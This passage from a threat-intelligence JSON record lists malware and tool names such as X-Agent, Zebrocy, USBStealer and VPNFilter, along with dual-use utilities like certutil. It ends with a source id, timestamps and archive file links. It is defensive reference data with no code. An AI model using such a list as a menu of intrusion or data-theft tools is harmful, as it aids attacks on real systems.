"Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434265, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.pdf", "text": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.txt", "img": "https://archive.orkl.eu/8c43c98c4d92b683088413f7f1c9be56e1e2a0f6.jpg" } }